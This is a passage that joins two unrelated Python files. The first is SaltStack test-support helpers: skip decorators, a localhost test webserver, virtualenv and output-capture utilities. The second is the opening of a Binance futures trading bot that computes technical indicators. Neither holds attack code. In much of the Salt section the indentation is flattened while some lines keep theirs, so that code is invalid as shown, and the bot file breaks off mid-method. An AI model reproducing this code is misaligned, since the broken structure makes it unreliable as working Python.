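# test receives the generated temporary file path as an extra positional argument.
def _example_with_tempfile():
    import unittest
    class TempfileTest(unittest.TestCase):
        @with_tempfile()
        def test_write_config(self, tempfile_path):
            with salt.utils.files.fopen(tempfile_path, "w") as wfh:
                wfh.write("key: value")
    return TempfileTest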
class WithTempdir:
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
tempdir = tempfile.mkdtemp(**self.kwargs)
if not self.create:
os.rmdir(tempdir)
try:
return self.func(testcase, tempdir, *args, **kwargs)
finally:
shutil.rmtree(tempdir, ignore_errors=True)
with_tempdir = WithTempdir
def requires_system_grains(func):
"""
Function decorator which loads and passes the system's grains to the test
case.
"""
@functools.wraps(func)
def decorator(*args, **kwargs):
if not hasattr(requires_system_grains, "__grains__"):
# Late import
from tests.support.sminion import build_minion_opts
opts = build_minion_opts(minion_id="runtests-internal-sminion")
requires_system_grains.__grains__ = salt.loader.grains(opts)
kwargs["grains"] = requires_system_grains.__grains__
return func(*args, **kwargs)
return decorator
@requires_system_grains
def runs_on(grains=None, **kwargs):
"""
    Skip the test if the grains don't match the values passed in via **kwargs.
    If a kwarg value is a list, the test is skipped when the grains don't match
    any item in that list.
"""
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
            if not any(str(grains.get(kw)).lower() == str(v).lower() for v in value):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
return skip(reason)
else:
if str(grains.get(kw)).lower() != str(value).lower():
if reason is None:
reason = "This test runs on {}={}, not {}".format(
kw, value, grains.get(kw)
)
return skip(reason)
return _id
@requires_system_grains
def not_runs_on(grains=None, **kwargs):
"""
Reverse of `runs_on`.
    Skip the test if any grains match the values passed in via **kwargs.
    If a kwarg value is a list, the test is skipped when the grains match any
    item in that list.
"""
reason = kwargs.pop("reason", None)
for kw, value in kwargs.items():
if isinstance(value, list):
if any(str(grains.get(kw)).lower() == str(v).lower() for v in value):
if reason is None:
reason = "This test does not run on {}={}".format(
kw, grains.get(kw)
)
return skip(reason)
else:
if str(grains.get(kw)).lower() == str(value).lower():
if reason is None:
reason = "This test does not run on {}={}, got {}".format(
kw, value, grains.get(kw)
)
return skip(reason)
return _id
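# Usage sketch (illustrative; the grain names/values are examples): both helpers
# return either ``skip(reason)`` or the identity decorator based on the loaded grains.
def _example_runs_on():
    import unittest
    class GrainGatedTest(unittest.TestCase):
        @runs_on(kernel="Linux", reason="Only relevant on Linux kernels")
        def test_linux_only(self):
            pass
        @not_runs_on(os="Windows")
        def test_everything_but_windows(self):
            pass
    return GrainGatedTest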
def _check_required_sminion_attributes(sminion_attr, *required_items):
"""
:param sminion_attr: The name of the sminion attribute to check, such as 'functions' or 'states'
:param required_items: The items that must be part of the designated sminion attribute for the decorated test
:return The packages that are not available
"""
# Late import
from tests.support.sminion import create_sminion
required_salt_items = set(required_items)
sminion = create_sminion(minion_id="runtests-internal-sminion")
available_items = list(getattr(sminion, sminion_attr))
not_available_items = set()
name = "__not_available_{items}s__".format(items=sminion_attr)
if not hasattr(sminion, name):
setattr(sminion, name, set())
cached_not_available_items = getattr(sminion, name)
for not_available_item in cached_not_available_items:
if not_available_item in required_salt_items:
not_available_items.add(not_available_item)
required_salt_items.remove(not_available_item)
for required_item_name in required_salt_items:
search_name = required_item_name
if "." not in search_name:
search_name += ".*"
if not fnmatch.filter(available_items, search_name):
not_available_items.add(required_item_name)
cached_not_available_items.add(required_item_name)
return not_available_items
def requires_salt_states(*names):
"""
Makes sure the passed salt state is available. Skips the test if not
.. versionadded:: 3000
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@requires_salt_states`, it will be removed in {date}, and"
" instead use `@pytest.mark.requires_salt_states`.",
stacklevel=3,
)
not_available = _check_required_sminion_attributes("states", *names)
if not_available:
return skip("Unavailable salt states: {}".format(*not_available))
return _id
def requires_salt_modules(*names):
"""
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@requires_salt_modules`, it will be removed in {date}, and"
" instead use `@pytest.mark.requires_salt_modules`.",
stacklevel=3,
)
not_available = _check_required_sminion_attributes("functions", *names)
if not_available:
return skip("Unavailable salt modules: {}".format(*not_available))
return _id
def skip_if_binaries_missing(*binaries, **kwargs):
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@skip_if_binaries_missing`, it will be removed in {date},"
" and instead use `@pytest.mark.skip_if_binaries_missing`.",
stacklevel=3,
)
import salt.utils.path
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop("check_all", False)
message = kwargs.pop("message", None)
if kwargs:
raise RuntimeError(
"The only supported keyword argument is 'check_all' and "
"'message'. Invalid keyword arguments: {}".format(", ".join(kwargs.keys()))
)
if check_all:
for binary in binaries:
if salt.utils.path.which(binary) is None:
return skip(
"{}The {!r} binary was not found".format(
message and "{}. ".format(message) or "", binary
)
)
elif salt.utils.path.which_bin(binaries) is None:
return skip(
"{}None of the following binaries was found: {}".format(
message and "{}. ".format(message) or "", ", ".join(binaries)
)
)
return _id
def skip_if_not_root(func):
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@skip_if_not_root`, it will be removed in {date}, and"
" instead use `@pytest.mark.skip_if_not_root`.",
stacklevel=3,
)
setattr(func, "__skip_if_not_root__", True)
if not sys.platform.startswith("win"):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as root to run this test"
)
else:
current_user = salt.utils.win_functions.get_current_user()
if current_user != "SYSTEM":
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as an Administrator to run this test"
)
return func
def repeat(caller=None, condition=True, times=5):
"""
Repeat a test X amount of times until the first failure.
.. code-block:: python
class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
repeat(caller=function, condition=condition, times=times),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(1, times + 1):
log.info("%s test run %d of %s times", cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
"""
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(salt.ext.tornado.web.RequestHandler):
pass
"""
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get("Authorization")
if auth is None or not auth.startswith("Basic "):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header("WWW-Authenticate", "Basic realm=Restricted")
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
                    username, password = base64.b64decode(auth[6:]).decode().split(":", 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
"""
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: 2018.3.0
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please replace your call 'generate_random_name({0})' with 'random_string({0},"
" lowercase=False)' as 'generate_random_name' will be removed after {{date}}".format(
prefix
),
stacklevel=3,
)
return random_string(prefix, size=size, lowercase=False)
def random_string(prefix, size=6, uppercase=True, lowercase=True, digits=True):
"""
Generates a random string.
    .. versionadded:: 3001
Args:
prefix(str): The prefix for the random string
size(int): The size of the random string
uppercase(bool): If true, include uppercased ascii chars in choice sample
lowercase(bool): If true, include lowercased ascii chars in choice sample
digits(bool): If true, include digits in choice sample
Returns:
str: The random string
"""
if not any([uppercase, lowercase, digits]):
raise RuntimeError(
"At least one of 'uppercase', 'lowercase' or 'digits' needs to be true"
)
choices = []
if uppercase:
choices.extend(string.ascii_uppercase)
if lowercase:
choices.extend(string.ascii_lowercase)
if digits:
choices.extend(string.digits)
return prefix + "".join(random.choice(choices) for _ in range(size))
class Webserver:
"""
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
"""
def __init__(self, root=None, port=None, wait=5, handler=None, ssl_opts=None):
"""
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
"""
if port is not None and not isinstance(port, int):
raise ValueError("port must be an integer")
if root is None:
root = RUNTIME_VARS.BASE_FILES
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError("root must be a string")
self.port = port
self.wait = wait
self.handler = (
handler if handler is not None else salt.ext.tornado.web.StaticFileHandler
)
self.web_root = None
self.ssl_opts = ssl_opts
def target(self):
"""
Threading target which stands up the tornado application
"""
self.ioloop = salt.ext.tornado.ioloop.IOLoop()
self.ioloop.make_current()
if self.handler == salt.ext.tornado.web.StaticFileHandler:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler, {"path": self.root})]
)
else:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler)]
)
self.application.listen(self.port, ssl_options=self.ssl_opts)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock.connect_ex(("127.0.0.1", self.port)) == 0
def url(self, path):
"""
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
"""
if self.web_root is None:
raise RuntimeError("Webserver instance has not been started")
err_msg = (
"invalid path, must be either a relative path or a path within {}".format(
self.root
)
)
try:
relpath = (
path if not os.path.isabs(path) else os.path.relpath(path, self.root)
)
if relpath.startswith(".." + os.sep):
raise ValueError(err_msg)
return "/".join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
"""
Starts the webserver
"""
if self.port is None:
self.port = ports.get_unused_localhost_port()
self.web_root = "http{}://127.0.0.1:{}".format(
"s" if self.ssl_opts else "", self.port
)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
"Failed to start tornado webserver on 127.0.0.1:{} within "
"{} seconds".format(self.port, self.wait)
)
def stop(self):
"""
Stops the webserver
"""
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
def __enter__(self):
self.start()
return self
def __exit__(self, *_):
self.stop()
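# Usage sketch (illustrative; the relative path is hypothetical): the class also
# supports the context manager protocol, which stops the IOLoop on exit.
def _example_webserver():
    with Webserver(root=RUNTIME_VARS.BASE_FILES) as webserver:
        url = webserver.url("some/relative/path")
        log.debug("Serving %s at %s", webserver.root, url)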
class SaveRequestsPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Save all requests sent to the server.
"""
received_requests = []
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
self.received_requests.append(self.request)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
class MirrorPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Mirror a POST body back to the client
"""
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
body = self.request.body
log.debug("Incoming body: %s Incoming args: %s", body, args)
self.write(body)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
def dedent(text, linesep=os.linesep):
"""
A wrapper around textwrap.dedent that also sets line endings.
"""
linesep = salt.utils.stringutils.to_unicode(linesep)
unicode_text = textwrap.dedent(salt.utils.stringutils.to_unicode(text))
clean_text = linesep.join(unicode_text.splitlines())
if unicode_text.endswith("\n"):
clean_text += linesep
if not isinstance(text, str):
return salt.utils.stringutils.to_bytes(clean_text)
return clean_text
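# Minimal sketch of the behaviour: indentation is stripped and each line ending is
# normalised to ``linesep`` (``os.linesep`` by default).
def _example_dedent():
    src = "    line one\n    line two\n"
    assert dedent(src, linesep="\n") == "line one\nline two\n"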
class PatchedEnviron:
def __init__(self, **kwargs):
self.cleanup_keys = kwargs.pop("__cleanup__", ())
self.kwargs = kwargs
self.original_environ = None
def __enter__(self):
self.original_environ = os.environ.copy()
for key in self.cleanup_keys:
os.environ.pop(key, None)
# Make sure there are no unicode characters in the self.kwargs if we're
# on Python 2. These are being added to `os.environ` and causing
# problems
if sys.version_info < (3,):
kwargs = self.kwargs.copy()
clean_kwargs = {}
for k in self.kwargs:
key = k
if isinstance(key, str):
key = key.encode("utf-8")
if isinstance(self.kwargs[k], str):
kwargs[k] = kwargs[k].encode("utf-8")
clean_kwargs[key] = kwargs[k]
self.kwargs = clean_kwargs
os.environ.update(**self.kwargs)
return self
def __exit__(self, *args):
os.environ.clear()
os.environ.update(self.original_environ)
patched_environ = PatchedEnviron
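# Usage sketch (illustrative; the variable names are examples): temporarily remove
# and/or override environment variables for the duration of a ``with`` block.
def _example_patched_environ():
    with patched_environ(__cleanup__=("LANG",), LC_ALL="C"):
        assert os.environ["LC_ALL"] == "C"
        assert "LANG" not in os.environ
    # the previous environment is restored on exit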
def _cast_to_pathlib_path(value):
if isinstance(value, pathlib.Path):
return value
return pathlib.Path(str(value))
@attr.s(frozen=True, slots=True)
class VirtualEnv:
venv_dir = attr.ib(converter=_cast_to_pathlib_path)
env = attr.ib(default=None)
system_site_packages = attr.ib(default=False)
pip_requirement = attr.ib(default="pip>=20.2.4,<21.2", repr=False)
setuptools_requirement = attr.ib(
default="setuptools!=50.*,!=51.*,!=52.*", repr=False
)
environ = attr.ib(init=False, repr=False)
venv_python = attr.ib(init=False, repr=False)
venv_bin_dir = attr.ib(init=False, repr=False)
@venv_dir.default
def _default_venv_dir(self):
return pathlib.Path(tempfile.mkdtemp(dir=RUNTIME_VARS.TMP))
@environ.default
def _default_environ(self):
environ = os.environ.copy()
if self.env:
environ.update(self.env)
return environ
@venv_python.default
def _default_venv_python(self):
# Once we drop Py3.5 we can stop casting to string
if salt.utils.platform.is_windows():
return str(self.venv_dir / "Scripts" / "python.exe")
return str(self.venv_dir / "bin" / "python")
@venv_bin_dir.default
def _default_venv_bin_dir(self):
return pathlib.Path(self.venv_python).parent
def __enter__(self):
try:
self._create_virtualenv()
except subprocess.CalledProcessError:
raise AssertionError("Failed to create virtualenv")
return self
def __exit__(self, *args):
shutil.rmtree(str(self.venv_dir), ignore_errors=True)
def install(self, *args, **kwargs):
return self.run(self.venv_python, "-m", "pip", "install", *args, **kwargs)
def uninstall(self, *args, **kwargs):
return self.run(
self.venv_python, "-m", "pip", "uninstall", "-y", *args, **kwargs
)
def run(self, *args, **kwargs):
check = kwargs.pop("check", True)
kwargs.setdefault("cwd", str(self.venv_dir))
kwargs.setdefault("stdout", subprocess.PIPE)
kwargs.setdefault("stderr", subprocess.PIPE)
kwargs.setdefault("universal_newlines", True)
kwargs.setdefault("env", self.environ)
proc = subprocess.run(args, check=False, **kwargs)
ret = ProcessResult(
returncode=proc.returncode,
stdout=proc.stdout,
stderr=proc.stderr,
cmdline=proc.args,
)
log.debug(ret)
if check is True:
try:
proc.check_returncode()
except subprocess.CalledProcessError:
raise ProcessFailed(
"Command failed return code check", process_result=proc
)
return ret
@staticmethod
def get_real_python():
"""
The reason why the virtualenv creation is proxied by this function is mostly
because under windows, we can't seem to properly create a virtualenv off of
        another virtualenv (we can on linux) and also because we really don't want to
test virtualenv creation off of another virtualenv, we want a virtualenv created
from the original python.
Also, on windows, we must also point to the virtualenv binary outside the existing
virtualenv because it will fail otherwise
"""
try:
if salt.utils.platform.is_windows():
return os.path.join(sys.real_prefix, os.path.basename(sys.executable))
else:
python_binary_names = [
"python{}.{}".format(*sys.version_info),
"python{}".format(*sys.version_info),
"python",
]
for binary_name in python_binary_names:
python = os.path.join(sys.real_prefix, "bin", binary_name)
if os.path.exists(python):
break
else:
raise AssertionError(
"Couldn't find a python binary name under '{}' matching: {}".format(
os.path.join(sys.real_prefix, "bin"), python_binary_names
)
)
return python
except AttributeError:
return sys.executable
def run_code(self, code_string, **kwargs):
if code_string.startswith("\n"):
code_string = code_string[1:]
code_string = textwrap.dedent(code_string).rstrip()
log.debug(
"Code to run passed to python:\n>>>>>>>>>>\n%s\n<<<<<<<<<<", code_string
)
return self.run(str(self.venv_python), "-c", code_string, **kwargs)
def get_installed_packages(self):
data = {}
ret = self.run(str(self.venv_python), "-m", "pip", "list", "--format", "json")
for pkginfo in json.loads(ret.stdout):
data[pkginfo["name"]] = pkginfo["version"]
return data
def _create_virtualenv(self):
sminion = create_sminion()
sminion.functions.virtualenv.create(
str(self.venv_dir),
python=self.get_real_python(),
system_site_packages=self.system_site_packages,
)
self.install("-U", self.pip_requirement, self.setuptools_requirement)
log.debug("Created virtualenv in %s", self.venv_dir)
@attr.s(frozen=True, slots=True)
class SaltVirtualEnv(VirtualEnv):
"""
This is a VirtualEnv implementation which has this salt checkout installed in it
using static requirements
"""
def _create_virtualenv(self):
super()._create_virtualenv()
self.install(RUNTIME_VARS.CODE_DIR)
def install(self, *args, **kwargs):
env = self.environ.copy()
env.update(kwargs.pop("env", None) or {})
env["USE_STATIC_REQUIREMENTS"] = "1"
kwargs["env"] = env
return super().install(*args, **kwargs)
@contextmanager
def change_cwd(path):
"""
Context manager helper to change CWD for a with code block and restore
it at the end
"""
old_cwd = os.getcwd()
try:
os.chdir(path)
# Do stuff
yield
finally:
# Restore Old CWD
os.chdir(old_cwd)
@functools.lru_cache(maxsize=1)
def get_virtualenv_binary_path():
# Under windows we can't seem to properly create a virtualenv off of another
# virtualenv, we can on linux but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(real_prefix, "Scripts", "virtualenv.exe")
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get("PATH")
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ["PATH"] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which("virtualenv")
if path is not None:
# Restore previous environ PATH
os.environ["PATH"] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
return virtualenv_binary
class CaptureOutput:
def __init__(self, capture_stdout=True, capture_stderr=True):
if capture_stdout:
self._stdout = io.StringIO()
else:
self._stdout = None
if capture_stderr:
self._stderr = io.StringIO()
else:
self._stderr = None
self._original_stdout = None
self._original_stderr = None
def __enter__(self):
if self._stdout:
self._original_stdout = sys.stdout
sys.stdout = self._stdout
if self._stderr:
self._original_stderr = sys.stderr
sys.stderr = self._stderr
return self
def __exit__(self, *args):
if self._stdout:
sys.stdout = self._original_stdout
self._original_stdout = None
if self._stderr:
sys.stderr = self._original_stderr
self._original_stderr = None
@property
def stdout(self):
if self._stdout is None:
return
self._stdout.seek(0)
return self._stdout.read()
@property
def stderr(self):
if self._stderr is None:
return
self._stderr.seek(0)
return self._stderr.read()
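# Usage sketch (illustrative): capture everything written to stdout/stderr inside
# the block and inspect it afterwards.
def _example_capture_output():
    with CaptureOutput() as capture:
        print("hello")
    assert capture.stdout == "hello\n"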
|
fastTradeV1.py
|
import logging
import asyncio
from binance.client import Client
from binance_f import RequestClient
from binance_f import SubscriptionClient
from binance_f.constant.test import *
from binance_f.model import *
from binance_f.exception.binanceapiexception import BinanceApiException
from binance_f.base.printobject import *
import time
import threading
import talib as ta
import numpy as np
from datetime import datetime
import curses
import json
import os
from os import path
from talipp.ohlcv import OHLCVFactory
import talipp.indicators as talippIndicator
def utc_2_datetime(timestamp):
return '{}({})'.format(datetime.fromtimestamp(int(timestamp)), (str(time.tzname[-1])))
def calculate_ema(np_price_list, indicator_config):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
# ema1 = ta.EMA(np_price_list, indicator_config['ema']['ema1'])
# ema2 = ta.EMA(np_price_list, indicator_config['ema']['ema2'])
# ema3 = ta.EMA(np_price_list, indicator_config['ema']['ema3'])
'''
ema_task_1 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema1']))
ema_task_2 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema2']))
ema_task_3 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema3']))
ema_task_1.start()
ema_task_2.start()
ema_task_3.start()
ema_task_1.join()
ema_task_2.join()
ema_task_3.join()
ema1 = ema_task_1.get_result()
ema2 = ema_task_2.get_result()
    ema3 = ema_task_3.get_result()
return [ema1, ema2, ema3]
def calculate_macd(np_price_list, indicator_config):
macd, macdsignal, macdhist = ta.MACD(np_price_list,
fastperiod=indicator_config['macd']['fastperiod'],
slowperiod=indicator_config['macd']['slowperiod'],
signalperiod=indicator_config['macd']['signalperiod'])
return [macd, macdsignal, macdhist]
def calculate_rsi(np_price_list, indicator_config):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
# rsi_1 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi1'])
# rsi_2 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi2'])
# rsi_3 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi3'])
'''
res_task_1 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi1']))
res_task_2 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi2']))
res_task_3 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi3']))
res_task_1.start()
res_task_2.start()
res_task_3.start()
res_task_1.join()
res_task_2.join()
res_task_3.join()
res1 = res_task_1.get_result()
res2 = res_task_2.get_result()
    res3 = res_task_3.get_result()
return [res1, res2, res3]
def calculate_emv(open, high, low, close, volume, indicator_config):
period = indicator_config['emv']['period']
divisor = indicator_config['emv']['divisor']
ohlcv = OHLCVFactory.from_matrix2(
[
open,
high,
low,
close,
volume
]
)
return talippIndicator.EMV(period, divisor, ohlcv)[-1]
def get_indicators(kline_dict, indicator_config):
open_price_list = np.array(kline_dict['open_price_list']).astype(float)
high_price_list = np.array(kline_dict['high_price_list']).astype(float)
low_price_list = np.array(kline_dict['low_price_list']).astype(float)
close_price_list = np.array(kline_dict['close_price_list']).astype(float)
vol_list = np.array(kline_dict['volume_list']).astype(float)
MACD_task = MyThread(calculate_macd, args=(close_price_list, indicator_config))
EMA_task = MyThread(calculate_ema, args=(close_price_list, indicator_config))
RSI_task = MyThread(calculate_rsi, args=(close_price_list, indicator_config))
EMV_task = MyThread(calculate_emv, args=(open_price_list, high_price_list, low_price_list, close_price_list, vol_list, indicator_config))
# indicator_task_list = [MACD_task, EMA_task, RSI_task, EMV_task]
indicator_task_list = [MACD_task, EMA_task, RSI_task, EMV_task]
for task in indicator_task_list:
task.start()
for task in indicator_task_list:
task.join()
MACD_result = MACD_task.get_result()
EMA_result = EMA_task.get_result()
RSI_result = RSI_task.get_result()
    EMV_result = EMV_task.get_result()
    return MACD_result, EMA_result, RSI_result, EMV_result
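# Shape sketch (illustrative values only): ``indicator_config`` is expected to carry
# the per-indicator settings read above, and ``kline_dict`` the parallel
# open/high/low/close/volume lists. Only keys actually used by the functions above
# are shown here.
EXAMPLE_INDICATOR_CONFIG = {
    'macd': {'fastperiod': 12, 'slowperiod': 26, 'signalperiod': 9},
    'ema': {'ema1': 7, 'ema2': 25, 'ema3': 99},
    'rsi': {'rsi1': 6, 'rsi2': 12, 'rsi3': 24},
    'emv': {'period': 14, 'divisor': 10000},
}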
def current_date_time():
return '{}({})'.format(datetime.now().strftime("%d/%m/%Y %H:%M:%S"), (str(time.tzname[-1])))
def current_utc_time():
return time.time()
def convert_object_to_string(object):
object_dict = (object.__dict__)
string = '====================================================================\n'
for key in object_dict.keys():
string += '{}: {}\n'.format(key, object_dict[key])
return string
def put_to_log(content, path):
'''
https://www.guru99.com/reading-and-writing-files-in-python.html
'''
try:
f=open(path, "a+")
f.write(content)
f.close()
except Exception as e:
print("Logging for {} failed: {}".format(content, e))
class MyThread(threading.Thread):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
'''
def __init__(self, func, args):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
try:
return self.result
except Exception:
return None
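# Usage sketch (illustrative): run a function in a worker thread and collect its
# return value, which a plain ``threading.Thread`` does not expose.
def _example_my_thread():
    task = MyThread(ta.EMA, args=(np.arange(100, dtype=float), 25))
    task.start()
    task.join()
    return task.get_result()  # numpy array of EMA values (NaN during warm-up)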
class positionStatus:
def __init__(self, paired_symbol):
self.paired_symbol = paired_symbol
self.position_object = Position()
# self.order_update_object =
self.order_status = None
self.order_side = None
self.order_amount = None
self.order_cumulativeFilledQty = None
self.position_last_update_time = None
self.order_last_update_time = None
class fastTrade:
def __init__(self, config):
self.__paried_symbol = config['paried_symbol']
self.__asset_symbol = config['asset_symbol']
self.__starting_asset_value = config['starting_asset_value']
self.__api_key = config['api_key']
self.__api_secret = config['api_secret']
self.__interval = config['interval']
self.__leverage = config['leverage']
self.__initial_data_num = config['initial_data_num']
self.__acc_profit = 0
self.__price_anneal = config['price_anneal']
self.__order_timeout = config['order_timeout']
self.__first_order = True
self.indicator_config = config['indicator_config']
self.position_status = positionStatus(self.__paried_symbol)
self.__recommendation_log_path = None
self.__order_log_path = None
self.__error_log_path = None
self.__position_log_path = None
self.__profit_log_path = None
self.__comission_rate = 0.0002 + 0.0004 + 0.0002
self.__latest_data_update_timestamp = 0
self.__latest_data_analysis_timestamp = 0
self.__latest_depth_update_timestamp = 0
self.order_update_list = []
self.account_update_list = []
self.depth_object = None
self.margin = '===================================================================='
self.target_profit_dict = config['target_profit']
self.__stop_loss_ratio = config['stop_loss_ratio']
self.__level_1_target_proofit = self.target_profit_dict['level1']
self.__level_2_target_proofit = self.target_profit_dict['level2']
self.__level_3_target_proofit = self.target_profit_dict['level3']
self.indicator_dict = dict()
        self.finished_position_dict = {}
        '''
        'uniqueOrderId': {
            'side': 'SIDE',
            'entryPrice': -99999,
            'exitPrice': -99999,
            'quantity': 0,
            'relatedOrderID': {}
        }
        '''
self.current_position_dict = {}
'''
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'relatedOrderID': {}
'comission': 999
}
...
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': 0,
'level': 0,
'price': None
}
}
# Need to be updated automatically
self.client = None
self.request_client = None
self.listen_key = None
self.exchange_info = None
self.paired_asset_info = None
self.account_info = None
self.sub_client = None
self.kline_info = {
'kline_list': {
'open_price_list': [],
'high_price_list': [],
'low_price_list': [],
'close_price_list': [],
'quoteAssetVolume_list': [],
'volume_list': [],
'takerBuyBaseAssetVolume_list': [],
'takerBuyQuoteAssetVolume_list': [],
'numTrades_list': []
},
'latest_time': 0
}
'''
"pricePrecision": 5, // 价格小数点位数
"quantityPrecision": 0, // 数量小数点位数
"baseAssetPrecision": 8, // 标的资产精度
"quotePrecision": 8, // 报价资产精度
'''
self.__pricePrecision = None
self.__quantityPrecision = None
self.__baseAssetPrecision = None
self.__quotePrecision = None
# self.__asset_balance = 0
# self.__remaining = 0
def update_config_info(self):
if self.sub_client != None:
self.sub_client.unsubscribe_all()
self.update_listen_key()
self.update_client()
self.update_exchange_info()
self.update_account_info()
self.get_historical_kline()
print('========== Succeed updating trading config ==========')
def make_dir(self):
'''
https://www.guru99.com/reading-and-writing-files-in-python.html
'''
try:
current_time = current_utc_time()
folder_name = str(int(current_time))
folder_path = 'logs/' + self.__paried_symbol + '/' + folder_name
self.__recommendation_log_path = folder_path + "/recommendation.txt"
self.__order_log_path = folder_path + "/order.txt"
self.__error_log_path = folder_path + "/error.txt"
self.__position_log_path = folder_path + "/position.txt"
self.__profit_log_path = folder_path + "/profit.txt"
if not os.path.exists('logs'):
os.mkdir('logs')
if not os.path.exists('logs/' + self.__paried_symbol):
os.mkdir('logs/' + self.__paried_symbol)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
current_datetime = utc_2_datetime(current_time)
recommendation_logs = open(self.__recommendation_log_path,"w+")
